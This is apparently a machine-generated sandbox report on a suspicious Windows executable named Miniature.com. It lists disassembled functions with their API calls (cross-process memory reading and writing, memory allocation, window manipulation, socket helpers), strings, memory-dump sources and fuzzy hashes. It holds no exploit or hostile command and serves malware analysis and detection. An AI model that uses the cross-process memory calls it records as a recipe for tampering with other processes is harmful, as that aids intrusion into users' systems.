                                                                                                                                                                                                                                                                                            • Opcode ID: 0587fa9176bd19674baae1e42ee9473483ce14ac66d08dc2e94ec3026378dcbf
                                                                                                                                                                                                                                                                                            • Instruction ID: a8c1cbd469c1a2449ad3aee6c862d993d82daa5676d81eada681cdd5b2cdf0e1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0587fa9176bd19674baae1e42ee9473483ce14ac66d08dc2e94ec3026378dcbf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39F0DAB0C421A19B8A12AF94FC83B4C3B68BB24771385091BF9159E2B5C7314911FFC4
                                                                                                                                                                                                                                                                                            Function 00C412B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: __freea$_free
                                                                                                                                                                                                                                                                                            • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                                            • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                                            • Opcode ID: c2c5ac95bbf5b521050922de1985cd25ad0cf05f7625a4f77539babd8e6aa110
                                                                                                                                                                                                                                                                                            • Instruction ID: a3855bdb6353fff3b5d78af18da32ada2fd07140e013810517f88b9c8f1da144
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2c5ac95bbf5b521050922de1985cd25ad0cf05f7625a4f77539babd8e6aa110
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85D10275A10206DACB249F68C8557FABBB1FF55300F2D415AEDA29B250D3359EC0CBA0
                                                                                                                                                                                                                                                                                            Function 00C73063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C72B1D,?,?,00000034,00000800,?,00000034), ref: 00C7BDF4
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C730AD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C72B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00C7BDBF
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00C7BD1C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C72AE1,00000034,?,?,00001004,00000000,00000000), ref: 00C7BD2C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C72AE1,00000034,?,?,00001004,00000000,00000000), ref: 00C7BD42
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C7311A
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C73167
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                            • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                                            • Opcode ID: 7e08b7266f981e0846aaf51a9ab41ba86465fefb5b328dd2dbf68329a6a66d08
                                                                                                                                                                                                                                                                                            • Instruction ID: ff397b06e8bd88456c59b44006dc12c609e97120dbeff9a25b99d2b0e3468df7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e08b7266f981e0846aaf51a9ab41ba86465fefb5b328dd2dbf68329a6a66d08
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C411972900218AFDB11DBA4CD81BDEBBB8EF49704F008095FA59B7185DA706F85DB60
                                                                                                                                                                                                                                                                                            Function 00C41A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user~1\AppData\Local\Temp\325114\Miniature.com,00000104), ref: 00C41AD9
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C41BA4
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C41BAE
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                            • String ID: C:\Users\user~1\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                            • API String ID: 2506810119-2331755113
                                                                                                                                                                                                                                                                                            • Opcode ID: 00d3d0a31e94d3e2f5e155e871c79ad2be80c1c847f6e13b7db4ab79b5321446
                                                                                                                                                                                                                                                                                            • Instruction ID: 0e9eaf74d9f5364c26e7855e4b3372bb6444f374ae82ae7b7592549c01b38605
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 00d3d0a31e94d3e2f5e155e871c79ad2be80c1c847f6e13b7db4ab79b5321446
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B73183B1E00258ABDB21DF99CC85E9EBBFCFB84710B1841A6F95497211E6704F80D790
                                                                                                                                                                                                                                                                                            Function 00C7CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C7CBB1
                                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00C7CBF7
                                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00CE29C0,01946320), ref: 00C7CC40
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: e5c0e2ba8109fa2493389e17776767f6bd973a013df9bb3721868958728a401f
                                                                                                                                                                                                                                                                                            • Instruction ID: 0b6a598e9fee4770e9655b2fea6a676754badfbe243627b4c672c71b7a6e10ff
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5c0e2ba8109fa2493389e17776767f6bd973a013df9bb3721868958728a401f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9041B0712043029FD725DF24D8C5B5ABBE8EF85714F148A1DF4AA97291DB30EA04CB62
                                                                                                                                                                                                                                                                                            Function 00CA4EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00CADCD0,00000000,?,?,?,?), ref: 00CA4F48
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32 ref: 00CA4F65
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CA4F75
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Long
                                                                                                                                                                                                                                                                                            • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                            • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                            • Opcode ID: fa3d184209808b2ec3ae3fa110069af94bb14c21f5a511efede480c5d88f37df
                                                                                                                                                                                                                                                                                            • Instruction ID: b54a020075ec0a38dab9805eea87f1668855d15198d813e5b2f7afaf383648ff
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa3d184209808b2ec3ae3fa110069af94bb14c21f5a511efede480c5d88f37df
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA31B031200206AFDB248F78DC45BEA77A9EB4A338F204725F976A31E0C7B0AD509B50
                                                                                                                                                                                                                                                                                            Function 00C93AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C93DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00C93AD4,?,?), ref: 00C93DD5
                                                                                                                                                                                                                                                                                            • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C93AD7
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C93AF8
                                                                                                                                                                                                                                                                                            • htons.WSOCK32(00000000,?,?,00000000), ref: 00C93B63
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                                                                            • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                                            • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                                                                            • Opcode ID: 202c9bbbd0d9301895ec2e0375073cac812cb541d5de4797b847cd3d8cd0d98e
                                                                                                                                                                                                                                                                                            • Instruction ID: 5c6fb57146be1e61ecfa144a177c58eef4752bcf3ca95fabfa03c39d25093879
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 202c9bbbd0d9301895ec2e0375073cac812cb541d5de4797b847cd3d8cd0d98e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A31A1356002819FCF10DF69C58AEAA77E1EF15328F248159E8268B792D735EF45CB60
                                                                                                                                                                                                                                                                                            Function 00CA4954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00CA49DC
                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00CA49F0
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CA4A14
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                                            • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                                            • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                                            • Opcode ID: a7c17a8117e3a187a2886137d6e1e9815e6a824e324241dcfc41c290b46c342f
                                                                                                                                                                                                                                                                                            • Instruction ID: 0a025b7fc330d7a4eb4d76bc7cb327d63643ea9aa4af48c99ddb4a63c02355d8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7c17a8117e3a187a2886137d6e1e9815e6a824e324241dcfc41c290b46c342f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2721D132600219BBDF158F60CC86FEF3B79EF89718F110214FA156B1D0D6B1AC559B90
                                                                                                                                                                                                                                                                                            Function 00CA50F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00CA51A3
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00CA51B1
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00CA51B8
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                                            • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                            • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                                            • Opcode ID: 431b039d7b4c286170babe0ee5bf8a145351e9246f28ad22c6bd9b0c65d8b975
                                                                                                                                                                                                                                                                                            • Instruction ID: 7e9f4788ca1f7d307e6a854ce5fcd6b86356908ae03a98baa1687706f9a8688c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 431b039d7b4c286170babe0ee5bf8a145351e9246f28ad22c6bd9b0c65d8b975
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC2190B560064AAFDB10DF24DCC1EBB37ADEB5A368B004059FA119B361CB70EC05DAA0
                                                                                                                                                                                                                                                                                            Function 00CA4253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00CA42DC
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00CA42EC
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00CA4312
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                                            • String ID: Listbox
                                                                                                                                                                                                                                                                                            • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                                            • Opcode ID: c84b0a0ab563758f0177810460740ebf13f8a548f36f1390b0729610fdf5df22
                                                                                                                                                                                                                                                                                            • Instruction ID: 98010c992cefce15badebcdfb3ccc62940286faf6a6af2a3490a600cdab3da56
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c84b0a0ab563758f0177810460740ebf13f8a548f36f1390b0729610fdf5df22
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3321C232600119BBEF158F94CC85FEF376EEFCA758F118214F9119B190C6B19C5187A0
                                                                                                                                                                                                                                                                                            Function 00C85439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00C8544D
                                                                                                                                                                                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C854A1
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,00CADCD0), ref: 00C85515
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                            • String ID: %lu
                                                                                                                                                                                                                                                                                            • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                                            • Opcode ID: a2cba25ac5afbefc4512aaa784b6ea8683deaa38db8bb14b739e8510c5c9fe82
                                                                                                                                                                                                                                                                                            • Instruction ID: 941f2da57ebbf66d6d4848914c0e85fb84b38d08e8a56e88be6dab0a5925d1b6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2cba25ac5afbefc4512aaa784b6ea8683deaa38db8bb14b739e8510c5c9fe82
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00315375A00109AFD710EF54C885EAE7BF8EF05318F1440A9F509DB262D771EE85DB61
                                                                                                                                                                                                                                                                                            Function 00CA4C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CA4CED
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CA4D02
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CA4D0F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                            • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                                            • Opcode ID: f6b42fabd5a0c0f653f4a4dc3f185908d503e95d6f8876f100eaedf4503d6996
                                                                                                                                                                                                                                                                                            • Instruction ID: 75d6e5c00589b0b57a04acf0c86ec81fcf661caf2f5d093431dd90532286927b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6b42fabd5a0c0f653f4a4dc3f185908d503e95d6f8876f100eaedf4503d6996
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3011E371240249BFEF215E69CC06FAB3BA8EF86B68F110514FA65E60A0C6B1D8509B20
                                                                                                                                                                                                                                                                                            Function 00C7389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
